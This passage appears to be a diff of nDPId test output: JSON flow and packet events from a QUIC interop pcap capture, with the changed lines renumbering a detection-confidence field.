-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00645{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1603816434507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434507,"pkt":"pJGxgjQ5PKn0qB\/sht1gChbjBNgRQCABCwcKydWupNP+R2kegH0qBdAYDOmBAM0q4v2zvsWrk\/QBuwTYWzDMCgoKCgiUaZcozIAAbQAARL5emZhgck3iuC3JUSB8iNm2XjGzLpnCsBWAY4Ojdy\/\/5MzHp06LTPIVKnl9FZGbcpBpkxyhd1DLZI+eYqtiEG5aKS74esaWBq8RL8\/CjhVxYArCrDSr+0hp9B1y+nWDHqDWr7MDZcNsju+tb0UHpoKlBgrUvyDGQhAsZRf7r39yd2xxEzbvuwQuuQ3ed9XQC5ng8bRhq403ZCE\/MYrs6MMmD1D8+1P9lcgzES1uneCIpx1HJrBTKP7nMlE81Z1P78Gu9qUmPawKzam5r0zOt6L0vp6aYOWsVv\/E0pz5vx1omUeD8AvBUEEvL\/DEN6PQFWuaU56poUyWE4zmT1fCmpfkQl2t9VM5S0DSjV9+bnc9oeMC84JGWazOmN+3mpmXoZcYRh07YBY2MZ4VnmznfQ80K1ED3kKFM39nycCSACELzlTXDOkJ\/ktY0JyGo358ZvTutgq61KEs8NzcRLv8hDrgsQWV4XjOrAL105eXrA5f784uvCuN2fslFwCeDS0drYeuYLl2X3IPLV7kaNRc+OWAxuENUrLcJjOCAml9vIubSnbhMgY8q\/R\/4iocbJeAZaxcxLWoaBL5Dy6c5RqwmcmQUw2FcUSfarB7m6DGemQRBI6m8IfxS6ULrn9t0ZaJXLuVmX9Bm2oeGECfAf31JRuwVJ9fv26n\/XDb55k0fcO\/t2QAqH5VfQ\/XE6N19TPKrMa5fdi51foR6Wyl8S6hOCeKDO2C9D5n0K\/H4Ph5+pkEEtQs72MottYSPihw0iY\/Fu1RfLXjTA4gqlduvFyO1c3LDQtaJKHg0vklnpsW\/ahvB9sqw1bthHTeyy2PAYGFyd5\/vPsWwu1prQnziZfvuZBv4r85RGoHlFs8OJLDxJP5Unl+UHM1ip66ezVc52fyagwU2p\/dNxSLNLq9ZZZxOqPXoRe4DIj2O5EE+tg2DBKVlqsKlvnpY2O8nYNOUYb06eUwLY7eUmyF5kAFPXCNi2RVkA+F1RffYC4TGxAF6olxMiRrcrs3c\/DtIuA3v9xxQcuNbfPZJrt6p2lhDsnJl0cXW7yahBQ3t8Vob3Fxn8maWSGCm5H4l+b5QiCXjD6aPLMIVSGOxlZuOuMShDlqCqLDm2rrFG\/Ex+58dfI4GZg27KkFrt8yKQU5xP3cDpmgWO8cz42odj5\/XN7ZJEwitO8kjLFt+mYDrVsscfg2UJe74+Xm4LAVvyTj\/b5G5HD1FrTlV0Rk9tUeirRMew509ZVXjW6YJYWL6zO9lgxLgoaV8Gd+v8yh8ZKPFv9a4RV\/5RBt4U2FAY94eskZ2SwKXWETml5yVCj4zuhjsEmm1HcHzPbvj3x0zXEiI2GG4l\/vpR4uTmkPxSOziP4F5ZFOBoaoWk92Q4T6koGjbXJnLz8U3PiyS0Qz4nAzJ2kSKRwz7zoxMiMJyM86M7+1Qefwixc4jngX8nk9EZniCllUXuWjwKpDQHahASkxBg+qPeRKYIoZbqfouV14QIMHyAa5JM7alvljGBrRgRAZXmcDpn2gAJImko\/gdF0i\/5wYy3K4UZeND0xxE7m532JLVgzS2+HslCBkUca8fdagWqHn+Gho8KaUeJhRfYw0ZgBrosRDMSIh0QMCIiGRjGE5z\/aohA=="} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00645{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434509,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1603816434509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434509,"pkt":"pJGxgjQ5PKn0qB\/sht1gAK6QBNgRQCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdhooBuwTYZF3MCgoKCgiLyuadTBhpMAAARL5Jn8vg\/A\/iHcc5HGyjUHtzYCYh3M+1HzdHtSjFxotnADrnTs2cVW9HALnbbxq+j13Bpa3hTOGyFKAuVKKOVbHcGaJLdNA06DSFzV66GiVnWQJ+1MFEeQ+EHU1tYSy5DynacUlvf1G20dd2kmKE70+xxOTQI+IxdCf39TGHKu+pGUdVYYzStvwWo5npAklpjTRW1hPHPgr+vxfK0tzntAB4tgdSsfnM003avASiWDb+GIQGRqQqd12Z3S73M6xSxbEpPhQs03GVV7j7jPCY+xuSqdE0+RC2M2xTxkDxrKzwifOo5JzioGQ8n1leAaytkPPh7\/6kP3tXKc3zSh+6mDapIcrXvGRPBtxzjcwZlnfC61xJLZ4o\/bDf7VXUn2iqev2r7RfntxDJ4F+CHoqdQU19Agb1DRLZ+44sSsLJRZPe0rMYqmphZb9TR\/CXfZoxmWSMgVmNHVqPhkUDRkBFiFUg2qWtzD6IUIlCi4UB90+3QDAMKbHPStmRV90FoZ4qgb1QWQshIsAOJrfADpMoeQeOvpHnWSBMA4n5tbORKddl3SJHwqDMa\/kYlEza3HmYzKyIekgCLUxBLZMgtxwl0pUeJvIYxMdZF6Znn7pRsQ+GhZyet6ZCOM2ft7uJCMRH5bphpdavcWHTrSt8uZ2iyfo3VofxaZqdzUsHHTpc9bD205szhfCxENgNATF1PGuWlfKJUrPPjUWPpw65iGFR3+hPQ1+ZRRE7orDx2vkC5kOJiEvbv0d6sp6yfMo3tuOn4kXULD2rf5TSc8aqDVZCklaUIbEuKaQv0jni\/XkpmdOw2UlUp3oYLZ9on+kdq43Nf9WrEJ+gfSZPMUZsyhXXyPRNGMrTBo0SUX31QcOdzW7AQaAXnJRZob+0gus27voTqIEPJh01fxeGPbXNNQ7VzwarPIKHRq1lGIs\/wJwJCsm2hQjq0+K3VFq4cXacrOp5mbdbbDJRXEnCejUnTswq7Ga3dz818NNmVp7FoznVEcHX3RQBfk8eLveHtTEpxIgmvWuj5aaZt+HyxH\/0YALf+wz6lv1s1l\/hg9o2e11OlebH1k7T7awcxgi41AZepwsE50V3GVh5GwIfK89lz9Ro6tly3hUhrsJ2ja1C+A6RBrWVVdcIlZY4BlIcSzf0BUccadkfpP\/Enz0yFkuHTLXTyrmsvl44wgxOvsJrZMwFacqnccJZHwZHWEMkNcxcPbL0Z2U7a3Xa12dEVYYVu1U+X65oQyb2yPkBqMJ+DTB9RU+DnZIynnRzCZZkuvH7Uzn\/zVoVu3fNULVHSP4L+ehdOiOmS0l9r6IzvZQbe+xLjtz2iXbuU36zKNhA17n0gtw0JDOpoFDbD0FwhdY1JUMZx18mcrbFQX02CO02e+BE1Anxc\/TfBIKj2hI2ObT4d57WIvq7cpwJxNdZMuBfjVhAX64+5X4J\/pGNdD3WMTo1fYU74kzII9sWnijVE1WzVIBymOIxdGDOuxbCm5vJaE\/oIJEfaWcfmDwa+jhxCRN2aqJvKC+Iwq2cNN7z7vgOXAZ9SIrdZFgVX8+v9NO3ca9aZtmZoK1IAWW54LXRx4BZnrJKuFoltIkcOXZOYajcaVAMSefQYGNrVyxL8AzXWJ9vEQ=="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434509,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434509,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434512,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1603816434512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434512,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAtF1AAEARybfAqAGAA3nyNreiAbsE7OwqxgoKCgoIdQnXg0rBLY8AAETSdSNeqCjc+r6H8HOL2nfX9Nl4bt2\/tch\/k3WGu45v6swQRKEZjB5cL5PwQRNSezjETWlwl9x31DElYvPiaTjwEzV3uzPoPSD3RDsDoNIOdJfzM8eeT+YF8HtZxPxl8JfMcAWEYacVzCIRBiKkRKZDpR5dR0ouRtlV3GGe7kt0DtTyh+sL3vELhV2kHz6ly30R\/jiT47NHUtkHKuInrvyxjGqVvAYH34n7tXCBQ6D+AfZH11fptBBQ7utMKjJQetgZnmiyn4jfUks45DQLptmzmM7vacgVM1UXfvDRMiXWFLlgc2aMseReas3HNr0PU1Ye1gi1puLSN2a9gpcRb+O0YMFs0jlKm38N1LBqGTBpyiDu8QECyVyUyl5oER0iWXuG3TbvkN2QQTnAKlJqm0eLVl\/NYu3z\/fNWg32CWUDT2152nd1+esKzcxvEOyGhXuUWhYZ2f900yvrQLHcBQy2bY\/c28n\/CX4U8pxI6NyIasmjHd4xMKoES4DMmjTKarxqquM7dXQbXZLB8En20kKfdQRYHHg+reqWqS2rb8XL4IMSIg8+UsaueMDmzrfUZd\/56R7cXjRlq+VUmt81q5nNnKCMBQ\/7rvr4qOGOZ2CHm9V+uADTNbhvve0l68irgd7nnxQpElTgIyjHyFhvd8KPoLd2HsWPDEewjah\/d5eFL2o2JGexda6drG5JkIeHDe6OWKoobO2FfYrFha9u0nzvL0Czf21A7G+Hktz+GtzDop6GmMw9wX0x7PAWZ9MWVDxJhZqMOzlDofB1A88ZWDukm1Hm6PVA8JMNdUp3UJt5LtDBJLLAEOUN0BNEg9pXHjjKOVZeJN8ZQvkURagzOCo3aTho10tRkW\/\/buLsCCgS9oRh18BVjsveR+UkY4XmNAimeDQhBeVIZNQAbv63kh8fikt2GCen13aqn\/akV6vyA3xP9zH8BrXE0pnxbTdVJRyKZmPMfH+2L5gdn4Inm\/u2BD5yUOdsZkjyDYog2dorLJX+t+PSQ9uXuCwdbDKjjZw9L8++g9YMCmG+DuNoxchSfm4TcUkVs0SgbA\/r\/65YZBCmO6TdtJWtU8H5XFhYFiz1Q78xobCBsvaSvzLLye5aeCDzi6qFTLk0yIv3EAu91rP\/6ul6HmTBVTtG3x8oOLW5WVDEqHHQcQF2G5KsSqr4MhwRqiW0iF9\/6ruIt5OM0L8g5QVUhLrV+wAUx9TrMv+LPDrsvG+Dx5k4p3UodhKDHRb\/7ijQM2ozG8RHNrTry6RrGZAsgdT3BTj1sf\/spjmdgzIF2pwahJa8xi9tbBXrUI1dyXG3+uu21VtbunHyZrZPu9Lqmex5yNEoIMYh8ALvFMBlRu18WIDIANDkgo6akaO98LoftutjwPgqclkRUkaNJO1Z4mpP+D3JcJ7AwJfHttUsGFLMXeHC0rS3Jx8xlGehlDG8Gjx6MbqsW4FVSy5EnAw4UdsWYMoAQZhCtB79ozmulqNFitQkW9QOF9WX6McnEdk8YyUFeo+qc1Fhx\/ki2cnpObQM3wblVzck3qttvXup8w\/1\/pw0ra8kGRFKBe8QDkHMzVAmkeyW7Mq2NBPRoMSnnA3XB4x1u8DQAzActQ0v3Mr5WeVLSgCf9kg2BakZtD12MZbxnzu5AN97akX7cpg=="} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434512,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434512,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00644{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434518,"flow_last_seen":1603816434518,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434518,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1603816434518,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434518,"pkt":"pJGxgjQ5PKn0qB\/sht1gAXvJBNgRQCABCwcKydWupNP+R2kegH0qAKwAQAAEAALgTP\/+aBmdvkMBuwTYCBnBCgoKCgiEPL7zH8M0IgAARL6eKfaWNoqFUZMIorsrR+PI0mjVI6LMaQTDmquE5419Uqg0GPvALnuSvRL73ivCKJwok1RPqjtpoqHTz45vYlbMW0kHssfjLAjOAUVEArsuhMOirtE412w2RU3RQOLAwrvAO4t8cjd0tkO3FdpXC1+6xCs\/9xwo3urZvY7tv+pPD0m9iy\/nLknxJjrg3PYY9NvAu4T1Yktb5QjJpDpv3IzaFim4vDdRfhCCfZLoy9vkSpiUxLSsp\/4K4guLZKTInOo7dc7L0u0RBuQrBPDDqK4FVSYOh3qSMuIrLfcW45Du9zFvbaiFI1Z3W2Zo1htxNdAgXrRsYiaF2UOsu3EWo22nmt3QVCTvxN40wXQBY474YpdLOSzJ8YT2z1lcFu0wBMnv5wKXxH924c65Vd8jn5+Ysdu9cokS2TeRsJwGH6f8UJWWqASwvtTblbNaAA1rpPkaZ6SKb5\/2SCA8NKsLTMfd9lXR\/TPIRkDa\/UKbcYJHJmruB8l71Ug149yMVHLyQ8PV4VkmIVimW0BwUZuqJHajnymZIECYtitexCiylm89U6E7Qol819M+CywoEZr0V1MUihq4vQCqT5IBPFtDKGbeUpuwEn9i1Sgfq7jW1ZF1lUJIXXxoY0W43gHceg0ibsXFS2Cu4BfCo2ARjzNDy5YP1fNhA\/sgI1UdsrpLLPnxOQD5MfwhgvGMBjmhjcscvgGoJNS3Mx4JzKbLqHshaWSTm\/LyTt9E6jEOyn\/elJ+Uz6TroidfobWRhT8DXti09Tw4xFpYjmFZS+sjqusErMX8BBmq9NavLEXrEkHMrSv7giTu2WivWYnhggGPBzPi9d7guvk48fb3nlBrDj9TyQ7mUjwRAlCv17XyLwk7KOYmtZZXJ3321lkp3bmJyRSPXB\/cv7ueIG6B+ug3kzrxt89xujNCeWtGdEmI4jIC4JS9GS8VFpY7y1HNYDb2ndNpNf5J7iwIXFXOR2gvyMqscy9rfPY85w\/ZzY6vHurlVpM9w3a5PREuXPDz6VgOdr20pgeNU8H73abMQojEillRJA93bqllSySvQYTvxdmLNI3kPK75CNOjeEksYsdF7tGWuteetV2CpVGc4fAfn7pKXvGC3QvR5rVa7kBRQpXGu246udb5IgCJQW4SWv9D41hRqVUqIhpV+jfVmbkfVSLTLo2RzlmBj7+a2aFtIWbpD7ANiOaRAl7rP5vSHQitoEDWhRQ+6AbGkwcuA7VjuhPuIHlBFBS73grpagTsbteLREgIXGdJVrSiF6wKPaotOPfLYFzLFzvsgAarE+d+Elzh343xLNOiKrK7GDHu3e49eOp9NamSo58Re3QCUDS3FIkTeME1ExL615hIro9N+tcv+\/TrXYarHmxDV0fGJC7I0oBmuLRb11ikCjaYc6FY98talPqVaf+74l6lZuX0twbSRQ9goQdc51kkKoNwIaEylg7FfWyw5YsxdYuXULPPqj5K3zNn8+VwtSMMfxRV+4q2DeFNLKi7SNoJlVxKbF9\/5E6m0hlFWybv1hE9ouYojrE6vOOYfXs3ptJPhGZaJArOV3rdeUnWT8I\/a\/Z7lnYxa5s8i\/zgpZP8zMFkDMjgYLge9GAnCTc\/tmQghNwZWih\/TQ=="} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434518,"flow_last_seen":1603816434518,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434518,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434518,"flow_last_seen":1603816434518,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434518,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434519,"flow_last_seen":1603816434519,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434519,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1603816434519,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434519,"pkt":"pJGxgjQ5PKn0qB\/sht1gBLPeBNgRQCABCwcKydWupNP+R2kegH0gAQvIR6QcJQAAAAAAAAAB67oBuwTYAdrFCgoKCgjhAy9VFSPmbQAARL7A303oZAFgGrTdGfei\/mHvqz29qgHXvt1vCJg2pc8FQKC36WDnBuPNUSWLIPLEGFVHDdTlHgEU8JaXOv5IcEJ6NZixRK+p1qGiKw+JPZoJHLOP3KMbB5ngi1RcHFIqjWkGqrO6Il1aIL5lyoE01q8y31quARUppPZlbh9u8WyKOZncFcG5VSpCu3UE+cTCqpGjHOnXC\/1HVlcF0rPYeaHUMOcvFeS7y7V49OnzF7ttNLuTcyzNKgrnqbXVeEFjqLCnQqFji\/PE8S791D2YivE\/b7eIwJzHPMOZxla3AUW1ggsh\/8zQVMk7TQ77ZAmxg7c56Ykrcym6mqal+6TN6kIdyk1r